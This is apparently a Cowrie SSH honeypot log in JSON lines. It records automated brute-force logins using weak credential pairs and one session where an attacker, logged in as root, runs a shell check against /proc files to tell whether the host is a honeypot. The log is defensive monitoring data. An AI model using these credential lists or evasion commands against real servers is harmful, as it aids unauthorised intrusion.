{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:07:08.063663Z","src_ip":"212.227.125.160","session":"c26909348ee8"}
{"eventid":"cowrie.session.connect","src_ip":"130.185.122.7","src_port":59930,"dst_ip":"1.2.3.4","dst_port":22,"session":"8eb120bbfa19","protocol":"ssh","message":"New connection: 130.185.122.7:59930 (1.2.3.4:22) [session: 8eb120bbfa19]","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.532505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.533437Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.569081Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.login.success","username":"root","password":"@DMIN","message":"login attempt [root/@DMIN] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.679138Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:07:25.766652Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.767367Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.768153Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.770029Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.770842Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.772743Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.773964Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.775042Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.776280Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.777709Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.779098Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.816656Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.817587Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:07:25.819023Z","src_ip":"130.185.122.7","session":"8eb120bbfa19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60814,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b4a2111efc5","protocol":"ssh","message":"New connection: 212.227.125.160:60814 (1.2.3.4:22) [session: 3b4a2111efc5]","sensor":"my-vps","timestamp":"2025-08-28T14:07:44.803168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:07:44.804325Z","src_ip":"212.227.125.160","session":"3b4a2111efc5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:07:44.972710Z","src_ip":"212.227.125.160","session":"3b4a2111efc5"}
{"eventid":"cowrie.login.failed","username":"debian","password":"12345678","message":"login attempt [debian/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T14:07:45.734462Z","src_ip":"212.227.125.160","session":"3b4a2111efc5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:07:46.909083Z","src_ip":"212.227.125.160","session":"3b4a2111efc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54134,"dst_ip":"1.2.3.4","dst_port":22,"session":"47c70a17ba4c","protocol":"ssh","message":"New connection: 212.227.125.160:54134 (1.2.3.4:22) [session: 47c70a17ba4c]","sensor":"my-vps","timestamp":"2025-08-28T14:08:20.797557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:08:20.798348Z","src_ip":"212.227.125.160","session":"47c70a17ba4c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:08:20.975304Z","src_ip":"212.227.125.160","session":"47c70a17ba4c"}
{"eventid":"cowrie.login.failed","username":"debian","password":"qwerty","message":"login attempt [debian/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T14:08:21.508042Z","src_ip":"212.227.125.160","session":"47c70a17ba4c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:08:22.687704Z","src_ip":"212.227.125.160","session":"47c70a17ba4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57712,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b09274a5601","protocol":"ssh","message":"New connection: 212.227.125.160:57712 (1.2.3.4:22) [session: 0b09274a5601]","sensor":"my-vps","timestamp":"2025-08-28T14:08:57.271126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:08:57.272781Z","src_ip":"212.227.125.160","session":"0b09274a5601"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:08:57.450380Z","src_ip":"212.227.125.160","session":"0b09274a5601"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123123","message":"login attempt [debian/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:08:57.985990Z","src_ip":"212.227.125.160","session":"0b09274a5601"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:08:59.166027Z","src_ip":"212.227.125.160","session":"0b09274a5601"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48816,"dst_ip":"1.2.3.4","dst_port":22,"session":"12ff64123ddd","protocol":"ssh","message":"New connection: 212.227.125.160:48816 (1.2.3.4:22) [session: 12ff64123ddd]","sensor":"my-vps","timestamp":"2025-08-28T14:09:34.631923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:09:34.632847Z","src_ip":"212.227.125.160","session":"12ff64123ddd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:09:34.802258Z","src_ip":"212.227.125.160","session":"12ff64123ddd"}
{"eventid":"cowrie.login.failed","username":"debian","password":"111111","message":"login attempt [debian/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T14:09:35.521865Z","src_ip":"212.227.125.160","session":"12ff64123ddd"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:09:36.694557Z","src_ip":"212.227.125.160","session":"12ff64123ddd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45514,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0e872e2d30b","protocol":"ssh","message":"New connection: 212.227.125.160:45514 (1.2.3.4:22) [session: e0e872e2d30b]","sensor":"my-vps","timestamp":"2025-08-28T14:10:10.873204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:10:10.874181Z","src_ip":"212.227.125.160","session":"e0e872e2d30b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:10:11.051576Z","src_ip":"212.227.125.160","session":"e0e872e2d30b"}
{"eventid":"cowrie.login.failed","username":"debian","password":"1234567","message":"login attempt [debian/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T14:10:11.584324Z","src_ip":"212.227.125.160","session":"e0e872e2d30b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:10:12.770225Z","src_ip":"212.227.125.160","session":"e0e872e2d30b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43334,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a6e4a3e3b06","protocol":"ssh","message":"New connection: 212.227.125.160:43334 (1.2.3.4:22) [session: 4a6e4a3e3b06]","sensor":"my-vps","timestamp":"2025-08-28T14:10:46.291199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:10:46.291903Z","src_ip":"212.227.125.160","session":"4a6e4a3e3b06"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:10:46.470808Z","src_ip":"212.227.125.160","session":"4a6e4a3e3b06"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":65242,"dst_ip":"1.2.3.4","dst_port":22,"session":"8188ba415376","protocol":"ssh","message":"New connection: 80.94.95.15:65242 (1.2.3.4:22) [session: 8188ba415376]","sensor":"my-vps","timestamp":"2025-08-28T14:10:46.499020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:10:46.500252Z","src_ip":"80.94.95.15","session":"8188ba415376"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:10:46.572953Z","src_ip":"80.94.95.15","session":"8188ba415376"}
{"eventid":"cowrie.login.failed","username":"user","password":"magnus","message":"login attempt [user/magnus] failed","sensor":"my-vps","timestamp":"2025-08-28T14:10:46.944132Z","src_ip":"80.94.95.15","session":"8188ba415376"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"123456","message":"login attempt [fedora/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T14:10:46.986436Z","src_ip":"212.227.125.160","session":"4a6e4a3e3b06"}
{"eventid":"cowrie.login.failed","username":"user","password":"lesbians","message":"login attempt [user/lesbians] failed","sensor":"my-vps","timestamp":"2025-08-28T14:10:48.012073Z","src_ip":"80.94.95.15","session":"8188ba415376"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:10:48.197320Z","src_ip":"212.227.125.160","session":"4a6e4a3e3b06"}
{"eventid":"cowrie.login.failed","username":"user","password":"krishna","message":"login attempt [user/krishna] failed","sensor":"my-vps","timestamp":"2025-08-28T14:10:49.082585Z","src_ip":"80.94.95.15","session":"8188ba415376"}
{"eventid":"cowrie.login.failed","username":"user","password":"hungry","message":"login attempt [user/hungry] failed","sensor":"my-vps","timestamp":"2025-08-28T14:10:50.151670Z","src_ip":"80.94.95.15","session":"8188ba415376"}
{"eventid":"cowrie.login.failed","username":"user","password":"hhhhhh","message":"login attempt [user/hhhhhh] failed","sensor":"my-vps","timestamp":"2025-08-28T14:10:51.228755Z","src_ip":"80.94.95.15","session":"8188ba415376"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:10:52.299432Z","src_ip":"80.94.95.15","session":"8188ba415376"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37244,"dst_ip":"1.2.3.4","dst_port":22,"session":"327071586789","protocol":"ssh","message":"New connection: 212.227.125.160:37244 (1.2.3.4:22) [session: 327071586789]","sensor":"my-vps","timestamp":"2025-08-28T14:11:20.854949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:11:20.900410Z","src_ip":"212.227.125.160","session":"327071586789"}
